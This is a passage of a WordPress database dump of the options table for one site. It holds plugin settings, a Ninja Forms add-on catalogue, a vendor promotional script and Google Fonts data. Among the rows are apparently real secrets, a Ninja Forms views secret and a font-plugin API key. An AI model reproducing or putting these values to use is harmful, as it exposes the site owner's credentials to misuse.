Activities!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/civicrm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CiviCRM\",\"plugin\":\"ninja-forms-civicrm\\/ninja-forms-civicrm.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/civicrm\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=CiviCRM+Docs\",\"version\":\"3.0.0\",\"categories\":[{\"name\":\"CRM Integrations\",\"slug\":\"crm-integrations\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"File Uploads\",\"image\":\"assets\\/img\\/add-ons\\/file-uploads.png\",\"content\":\"Add file upload fields to any WordPress form. Set allowed file types, sizes, upload directories and save to WordPress, Google Drive and more.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads\",\"plugin\":\"ninja-forms-uploads\\/file-uploads.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/file-uploads\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=File+Uploads+Docs\",\"version\":\"3.3.14\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"}]},{\"title\":\"User Management\",\"image\":\"assets\\/img\\/add-ons\\/user-management.png\",\"content\":\"Let users register, login, & manage profiles with customizable form templates. Allow user roles to view or edit form submissions. \",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management\",\"plugin\":\"ninja-forms-user-management\\/ninja-forms-user-management.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/user-management\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=User+Management+Docs\",\"version\":\"3.2.0\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Manage Users\",\"slug\":\"user-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Layout and Styles\",\"image\":\"assets\\/img\\/add-ons\\/layout-styles.png\",\"content\":\"Edit form styles. Create two column forms. Multi column forms. Easily adjust form layout. You don\'t need a designer, just Layout and Styles!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles\",\"plugin\":\"ninja-forms-style\\/ninja-forms-style.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/layouts-and-styles\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Layout+and+Styles+Docs\",\"version\":\"3.0.29\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"}]},{\"title\":\"Stripe\",\"image\":\"assets\\/img\\/add-ons\\/stripe.png\",\"content\":\"Use Stripe Checkout forms to sell products or subscriptions. Accept credit cards, Google Pay, Apple Pay, & much more!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe\",\"plugin\":\"ninja-forms-stripe\\/ninja-forms-stripe.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/stripe\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Stripe+Docs\",\"version\":\"3.2.2\",\"categories\":[{\"name\":\"Payment Gateways\",\"slug\":\"payment-gateways\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"}]},{\"title\":\"Conditional Logic\",\"image\":\"assets\\/img\\/add-ons\\/conditional-logic.png\",\"content\":\"Create forms that change as they\'re filled out. Show and hide fields, modify lists, send email to different recipients conditionally and much more.\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic\",\"plugin\":\"ninja-forms-conditionals\\/conditionals.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/conditional-logic\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=Conditional+Logic+Docs\",\"version\":\"3.1\",\"categories\":[{\"name\":\"Look &amp; Feel\",\"slug\":\"look-feel\"},{\"name\":\"Actions\",\"slug\":\"actions\"},{\"name\":\"Developer\",\"slug\":\"developer\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"User\",\"slug\":\"user\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Personal\",\"slug\":\"personal\"},{\"name\":\"Professional\",\"slug\":\"professional\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"Form Function and Design\",\"slug\":\"form-function-design\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Basic 2022\",\"slug\":\"basic-2022\"},{\"name\":\"Plus 2022\",\"slug\":\"plus-2022\"},{\"name\":\"Pro 2022\",\"slug\":\"pro-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Most Popular\",\"slug\":\"most-popular\"}]},{\"title\":\"PDF Form Submission\",\"image\":\"assets\\/img\\/add-ons\\/pdf-form-submission.png\",\"content\":\"Use PDF Form Submission to generate a PDF from any WordPress form submission. Create a fully customizable, fillable PDF from top to bottom!\",\"link\":\"https:\\/\\/ninjaforms.com\\/extensions\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission\",\"plugin\":\"ninja-forms-pdf-submissions\\/nf-pdf-submissions.php\",\"docs\":\"https:\\/\\/ninjaforms.com\\/docs\\/pdf\\/?utm_medium=plugin&utm_source=plugin-addons-page&utm_campaign=Ninja+Forms+Addons+Page&utm_content=PDF+Form+Submission+Docs\",\"version\":\"3.2.0\",\"categories\":[{\"name\":\"Content Management\",\"slug\":\"content-management\"},{\"name\":\"Membership\",\"slug\":\"membership\"},{\"name\":\"Business\",\"slug\":\"business\"},{\"name\":\"Agency\",\"slug\":\"agency\"},{\"name\":\"File Management\",\"slug\":\"file-management\"},{\"name\":\"Memberships 2022\",\"slug\":\"memberships-2022\"},{\"name\":\"Elite 2022\",\"slug\":\"elite-2022\"},{\"name\":\"Manage Submissions\",\"slug\":\"manage-submissions\"}]}]','no'),
(57347,'widget_ninja_forms_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(57348,'ninja-forms-views-secret','MS3ZOTtNr9QYYBLr3tgdNuNGvtqXRrl7xSH4I4om','yes'),
(57351,'ninja_forms_needs_updates','0','yes'),
(57353,'nf_admin_notice','a:1:{s:16:\"one_week_support\";a:2:{s:5:\"start\";s:10:\"11/19/2022\";s:3:\"int\";i:7;}}','yes'),
(57359,'nf_form_tel_data','1','no'),
(57362,'ninja_forms_allow_tracking','1','yes'),
(57363,'ninja_forms_optin_reported','1','yes'),
(57365,'nf_tel_collate','1','no'),
(57369,'fluentform_entry_details_migrated','yes','no'),
(57370,'fluentform_db_fluentform_logs_added','1','no'),
(57371,'fluentform_scheduled_actions_migrated','yes','no'),
(57372,'__fluentform_global_form_settings','a:1:{s:6:\"layout\";a:5:{s:14:\"labelPlacement\";s:3:\"top\";s:17:\"asteriskPlacement\";s:14:\"asterisk-right\";s:20:\"helpMessagePlacement\";s:10:\"with_label\";s:21:\"errorMessagePlacement\";s:6:\"inline\";s:12:\"cssClassName\";s:0:\"\";}}','no'),
(57373,'_fluentform_installed_version','5.0.7','no'),
(57374,'fluentform_global_modules_status','a:9:{s:9:\"mailchimp\";s:2:\"no\";s:14:\"activecampaign\";s:2:\"no\";s:16:\"campaign_monitor\";s:2:\"no\";s:17:\"constatantcontact\";s:2:\"no\";s:11:\"getresponse\";s:2:\"no\";s:8:\"icontact\";s:2:\"no\";s:7:\"webhook\";s:2:\"no\";s:6:\"zapier\";s:2:\"no\";s:5:\"slack\";s:2:\"no\";}','no'),
(57375,'widget_fluentform_widget','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),
(57379,'nf_active_promotions','{\"dashboard\":[{\"id\":\"sendwp-banner\",\"location\":\"dashboard\",\"content\":\"<span aria-label=\\\"SendWP. Getting WordPress email into an inbox shouldn\'t be that hard! Never miss another receipt, form submission, or any WordPress email ever again.\\\" style=\\\"cursor:pointer;width:800px;height:83px;border-radius:4px;-moz-border-radius:4px;-webkit-border-radius:4px;background-image:url(\'https:\\/\\/gsw2023.com\\/wp-content\\/plugins\\/ninja-forms\\/assets\\/img\\/promotions\\/dashboard-banner-sendwp.png\');display:block;\\\"><\\/span>\",\"type\":\"sendwp\",\"script\":\"\\n\\t\\t\\t\\tsetTimeout(function(){ \\/* Wait for services to init. *\\/\\n\\t\\t\\t\\t\\tvar data = {\\n\\t\\t\\t\\t\\t\\twidth: 450,\\n\\t\\t\\t\\t\\t\\tcloseOnClick: \'body\',\\n\\t\\t\\t\\t\\t\\tcloseOnEsc: true,\\n\\t\\t\\t\\t\\t\\tcontent: \'<p><h2>Frustrated that WordPress email isn\\u2019t being received?<\\/h2><p>Form submission notifications not hitting your inbox? Some of your visitors getting form feedback via email, others not? By default, your WordPress site sends emails through your web host, which can be unreliable. Your host has spent lots of time and money optimizing to serve your pages, not send your emails.<\\/p><h3>Sign up for SendWP today, and never deal with WordPress email issues again!<\\/h3><p>SendWP is an email service that removes your web host from the email equation.<\\/p><ul style=&quot;list-style-type:initial;margin-left: 20px;&quot;><li>Sends email through dedicated email service, increasing email deliverability.<\\/li><li>Keeps form submission emails out of spam by using a trusted email provider.<\\/li><li>On a shared web host? Don\\u2019t worry about emails being rejected because of blocked IP addresses.<\\/li><li><strong>$1 for the first month. $9\\/month after. Cancel anytime!<\\/strong><\\/li><\\/ul><\\/p><br \\/>\',\\n\\t\\t\\t\\t\\t\\tbtnPrimary: {\\n\\t\\t\\t\\t\\t\\t\\ttext: \'Sign me up!\',\\n\\t\\t\\t\\t\\t\\t\\tcallback: function() {\\n\\t\\t\\t\\t\\t\\t\\t\\tvar spinner = document.createElement(\'span\');\\n\\t\\t\\t\\t\\t\\t\\t\\tspinner.classList.add(\'dashicons\', \'dashicons-update\', \'dashicons-update-spin\');\\n\\t\\t\\t\\t\\t\\t\\t\\tvar w = this.offsetWidth;\\n\\t\\t\\t\\t\\t\\t\\t\\tthis.innerHTML = spinner.outerHTML;\\n\\t\\t\\t\\t\\t\\t\\t\\tthis.style.width = w+\'px\';\\n\\t\\t\\t\\t\\t\\t\\t\\tninja_forms_sendwp_remote_install();\\n\\t\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t\\t},\\n\\t\\t\\t\\t\\t\\tbtnSecondary: {\\n\\t\\t\\t\\t\\t\\t\\ttext: \'Cancel\',\\n\\t\\t\\t\\t\\t\\t\\tcallback: function() {\\n\\t\\t\\t\\t\\t\\t\\t\\tsendwpModal.toggleModal(false);\\n\\t\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\t}\\n\\t\\t\\t\\t\\tvar sendwpModal = new NinjaModal(data);\\n\\t\\t\\t\\t}, 500);\\n\\t\\t\\t\"}]}','no'),
(57397,'nf_form_tel_sent','true','no'),
(57440,'nf_sub_expiration','a:0:{}','yes'),
(57563,'user_registration_first_time_activation_flag','','yes'),
(57564,'user_registration_default_form_page_id','3320','yes'),
(57565,'user_registration_version','2.2.4','yes'),
(57566,'user_registration_db_version','2.2.4','yes'),
(57570,'user_registration_admin_notices','a:3:{i:0;s:8:\"register\";i:1;s:17:\"select_my_account\";i:2;s:7:\"install\";}','yes'),
(57571,'ur_profile_picture_migrated','1','yes'),
(57573,'user_registration_admin_notice_select_my_account','Please select My Account page in the <strong>User Registration -&gt; Settings -&gt; General -&gt; My Account section </strong> ( <a href=\"https://gsw2023.com/wp-admin//admin.php?page=user-registration-settings#user_registration_myaccount_page_id\" style=\"text-decoration:none\">My Account Page</a> )','yes'),
(57578,'user_registration_onboarding_skipped','1','yes'),
(57583,'user_registration_users_listing_viewed','2022-11-12 14:44:58','yes'),
(57665,'user_registration_date_box_1623051693_date_format','Y-m-d','yes'),
(143824,'ogf_activation_date','1672838368','no'),
(143882,'uaf_css_updated_timestamp','1675583275','yes'),
(143883,'uaf_site_url','aHR0cHM6Ly9nc3cyMDIzLmNvbQ==','yes'),
(143885,'uaf_install_date','2023-01-04','yes'),
(143886,'uaf_current_version','6.3.01','yes'),
(143887,'uaf_api_key','dbcc7c9686833495e70fc7d1d9e2451d','yes'),
(143888,'uaf_server_url_type','default','yes'),
(143889,'uaf_activated_url','aHR0cHM6Ly9nc3cyMDIzLmNvbQ==','yes'),
(143890,'uaf_uploader_type','js','yes'),
(143891,'uaf_font_display_property','auto','yes'),
(143892,'uaf_enable_multi_lang_support','0','yes'),
(143893,'uaf_disbale_editor_font_list','0','yes'),
(143894,'uaf_use_absolute_font_path','0','yes'),
(143895,'uaf_hide_key','no','yes'),
(143963,'uaf_font_data','{\"230104015350\":{\"font_name\":\"droid-serif\",\"font_path\":\"7025DROID-SERIF\",\"predefined_font_id\":\"\"}}','yes'),
(199091,'dt_portfolio_category_children','a:0:{}','yes'),
(208871,'googlesitekit_db_version','1.3.0','yes'),
(208872,'googlesitekit_has_connected_admins','0','yes'),
(208879,'_transient_googlesitekit_verification_meta_tags','a:0:{}','yes'),
(208965,'googlefonts_options','a:75:{s:17:\"googlefonts_font1\";s:0:\"\";s:17:\"googlefonts_font2\";s:0:\"\";s:17:\"googlefonts_font3\";s:0:\"\";s:17:\"googlefonts_font4\";s:0:\"\";s:17:\"googlefonts_font5\";s:0:\"\";s:17:\"googlefonts_font6\";s:0:\"\";s:15:\"googlefont1_css\";s:1:\" \";s:20:\"googlefont1_heading1\";s:7:\"checked\";s:20:\"googlefont1_heading2\";s:7:\"checked\";s:20:\"googlefont1_heading3\";s:7:\"checked\";s:20:\"googlefont1_heading4\";s:7:\"checked\";s:20:\"googlefont1_heading5\";s:7:\"checked\";s:20:\"googlefont1_heading6\";s:7:\"checked\";s:16:\"googlefont1_body\";s:7:\"checked\";s:22:\"googlefont1_blockquote\";s:7:\"checked\";s:13:\"googlefont1_p\";s:7:\"checked\";s:14:\"googlefont1_li\";s:7:\"checked\";s:15:\"googlefont2_css\";s:1:\" \";s:20:\"googlefont2_heading1\";s:9:\"unchecked\";s:20:\"googlefont2_heading2\";s:9:\"unchecked\";s:20:\"googlefont2_heading3\";s:9:\"unchecked\";s:20:\"googlefont2_heading4\";s:9:\"unchecked\";s:20:\"googlefont2_heading5\";s:9:\"unchecked\";s:20:\"googlefont2_heading6\";s:9:\"unchecked\";s:16:\"googlefont2_body\";s:9:\"unchecked\";s:22:\"googlefont2_blockquote\";s:9:\"unchecked\";s:13:\"googlefont2_p\";s:9:\"unchecked\";s:14:\"googlefont2_li\";s:9:\"unchecked\";s:15:\"googlefont3_css\";s:1:\" \";s:20:\"googlefont3_heading1\";s:9:\"unchecked\";s:20:\"googlefont3_heading2\";s:9:\"unchecked\";s:20:\"googlefont3_heading3\";s:9:\"unchecked\";s:20:\"googlefont3_heading4\";s:9:\"unchecked\";s:20:\"googlefont3_heading5\";s:9:\"unchecked\";s:20:\"googlefont3_heading6\";s:9:\"unchecked\";s:16:\"googlefont3_body\";s:9:\"unchecked\";s:22:\"googlefont3_blockquote\";s:9:\"unchecked\";s:13:\"googlefont3_p\";s:9:\"unchecked\";s:14:\"googlefont3_li\";s:9:\"unchecked\";s:15:\"googlefont4_css\";s:1:\" \";s:20:\"googlefont4_heading1\";s:9:\"unchecked\";s:20:\"googlefont4_heading2\";s:9:\"unchecked\";s:20:\"googlefont4_heading3\";s:9:\"unchecked\";s:20:\"googlefont4_heading4\";s:9:\"unchecked\";s:20:\"googlefont4_heading5\";s:9:\"unchecked\";s:20:\"googlefont4_heading6\";s:9:\"unchecked\";s:16:\"googlefont4_body\";s:9:\"unchecked\";s:22:\"googlefont4_blockquote\";s:9:\"unchecked\";s:13:\"googlefont4_p\";s:9:\"unchecked\";s:14:\"googlefont4_li\";s:9:\"unchecked\";s:15:\"googlefont5_css\";s:1:\" \";s:20:\"googlefont5_heading1\";s:9:\"unchecked\";s:20:\"googlefont5_heading2\";s:9:\"unchecked\";s:20:\"googlefont5_heading3\";s:9:\"unchecked\";s:20:\"googlefont5_heading4\";s:9:\"unchecked\";s:20:\"googlefont5_heading5\";s:9:\"unchecked\";s:20:\"googlefont5_heading6\";s:9:\"unchecked\";s:16:\"googlefont5_body\";s:9:\"unchecked\";s:22:\"googlefont5_blockquote\";s:9:\"unchecked\";s:13:\"googlefont5_p\";s:9:\"unchecked\";s:14:\"googlefont5_li\";s:9:\"unchecked\";s:15:\"googlefont6_css\";s:1:\" \";s:20:\"googlefont6_heading1\";s:9:\"unchecked\";s:20:\"googlefont6_heading2\";s:9:\"unchecked\";s:20:\"googlefont6_heading3\";s:9:\"unchecked\";s:20:\"googlefont6_heading4\";s:9:\"unchecked\";s:20:\"googlefont6_heading5\";s:9:\"unchecked\";s:20:\"googlefont6_heading6\";s:9:\"unchecked\";s:16:\"googlefont6_body\";s:9:\"unchecked\";s:22:\"googlefont6_blockquote\";s:9:\"unchecked\";s:13:\"googlefont6_p\";s:9:\"unchecked\";s:14:\"googlefont6_li\";s:9:\"unchecked\";s:20:\"googlefont_data_time\";i:1675583569;s:21:\"googlefont_selections\";a:6:{s:11:\"googlefont1\";a:3:{s:6:\"family\";s:10:\"Montserrat\";s:8:\"variants\";a:18:{i:0;s:3:\"100\";i:1;s:3:\"200\";i:2;s:3:\"300\";i:3;s:7:\"regular\";i:4;s:3:\"500\";i:5;s:3:\"600\";i:6;s:3:\"700\";i:7;s:3:\"800\";i:8;s:3:\"900\";i:9;s:9:\"100italic\";i:10;s:9:\"200italic\";i:11;s:9:\"300italic\";i:12;s:6:\"italic\";i:13;s:9:\"500italic\";i:14;s:9:\"600italic\";i:15;s:9:\"700italic\";i:16;s:9:\"800italic\";i:17;s:9:\"900italic\";}s:7:\"subsets\";a:5:{i:0;s:10:\"vietnamese\";i:1;s:9:\"latin-ext\";i:2;s:5:\"latin\";i:3;s:12:\"cyrillic-ext\";i:4;s:8:\"cyrillic\";}}s:11:\"googlefont2\";a:3:{s:6:\"family\";s:0:\"\";s:8:\"variants\";a:0:{}s:7:\"subsets\";a:0:{}}s:11:\"googlefont3\";a:3:{s:6:\"family\";s:0:\"\";s:8:\"variants\";a:0:{}s:7:\"subsets\";a:0:{}}s:11:\"googlefont4\";a:3:{s:6:\"family\";s:0:\"\";s:8:\"variants\";a:0:{}s:7:\"subsets\";a:0:{}}s:11:\"googlefont5\";a:3:{s:6:\"family\";s:0:\"\";s:8:\"variants\";a:0:{}s:7:\"subsets\";a:0:{}}s:11:\"googlefont6\";a:3:{s:6:\"family\";s:0:\"\";s:8:\"variants\";a:0:{}s:7:\"subsets\";a:0:{}}}s:25:\"googlefont_data_converted\";b:1;}','yes'),
(208966,'wp_google_fonts_global_notification','0','yes');
INSERT INTO `dnctiavkr_options` VALUES
(208986,'googlefonts_data','{\n  \"kind\": \"webfonts#webfontList\",\n  \"items\": [\n    {\n      \"family\": \"ABeeZee\",\n      \"variants\": [\n        \"regular\",\n        \"italic\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v22\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/abeezee/v22/esDR31xSG-6AGleN6tKukbcHCpE.ttf\",\n        \"italic\": \"http://fonts.gstatic.com/s/abeezee/v22/esDT31xSG-6AGleN2tCklZUCGpG-GQ.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Abel\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/abel/v18/MwQ5bhbm2POE6VhLPJp6qGI.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Abhaya Libre\",\n      \"variants\": [\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\",\n        \"sinhala\"\n      ],\n      \"version\": \"v13\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/abhayalibre/v13/e3tmeuGtX-Co5MNzeAOqinEge0PWovdU4w.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYj2ryqtxI6oYtBA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYo23yqtxI6oYtBA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEYx2zyqtxI6oYtBA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/abhayalibre/v13/e3t5euGtX-Co5MNzeAOqinEY22_yqtxI6oYtBA.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aboreto\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v2\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aboreto/v2/5DCXAKLhwDDQ4N8blKTeA2yuxSY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Abril Fatface\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/abrilfatface/v19/zOL64pLDlL1D99S8g8PtiKchm-BsjOLhZBY.ttf\"\n      },\n      \"category\": \"display\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Abyssinica SIL\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"ethiopic\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v5\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/abyssinicasil/v5/oY1H8ezOqK7iI3rK_45WKoc8J6UZBFOVAXuI.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Aclonica\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v18\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/aclonica/v18/K2FyfZJVlfNNSEBXGb7TCI6oBjLz.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Acme\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-12-08\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/acme/v21/RrQfboBx-C5_bx3Lb23lzLk.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Actor\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v17\",\n      \"lastModified\": \"2022-09-22\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/actor/v17/wEOzEBbCkc5cO3ekXygtUMIO.ttf\"\n      },\n      \"category\": \"sans-serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Adamina\",\n      \"variants\": [\n        \"regular\"\n      ],\n      \"subsets\": [\n        \"latin\"\n      ],\n      \"version\": \"v21\",\n      \"lastModified\": \"2022-04-20\",\n      \"files\": {\n        \"regular\": \"http://fonts.gstatic.com/s/adamina/v21/j8_r6-DH1bjoc-dwu-reETl4Bno.ttf\"\n      },\n      \"category\": \"serif\",\n      \"kind\": \"webfonts#webfont\"\n    },\n    {\n      \"family\": \"Advent Pro\",\n      \"variants\": [\n        \"100\",\n        \"200\",\n        \"300\",\n        \"regular\",\n        \"500\",\n        \"600\",\n        \"700\",\n        \"800\",\n        \"900\",\n        \"100italic\",\n        \"200italic\",\n        \"300italic\",\n        \"italic\",\n        \"500italic\",\n        \"600italic\",\n        \"700italic\",\n        \"800italic\",\n        \"900italic\"\n      ],\n      \"subsets\": [\n        \"cyrillic\",\n        \"cyrillic-ext\",\n        \"greek\",\n        \"latin\",\n        \"latin-ext\"\n      ],\n      \"version\": \"v19\",\n      \"lastModified\": \"2023-01-06\",\n      \"files\": {\n        \"100\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLQyJPTJoonw1aBA.ttf\",\n        \"200\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLwyNPTJoonw1aBA.ttf\",\n        \"300\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLHSNPTJoonw1aBA.ttf\",\n        \"regular\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLQyNPTJoonw1aBA.ttf\",\n        \"500\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLcSNPTJoonw1aBA.ttf\",\n        \"600\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLnSRPTJoonw1aBA.ttf\",\n        \"700\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLpCRPTJoonw1aBA.ttf\",\n        \"800\": \"http://fonts.gstatic.com/s/adventpro/v19/V8mqoQfxVT4Dvddr_yOwrzaFxV7JtdQgFqXdUAQrGp_zgX5sWCpLwyRPTJoonw1aBA.ttf\",\n        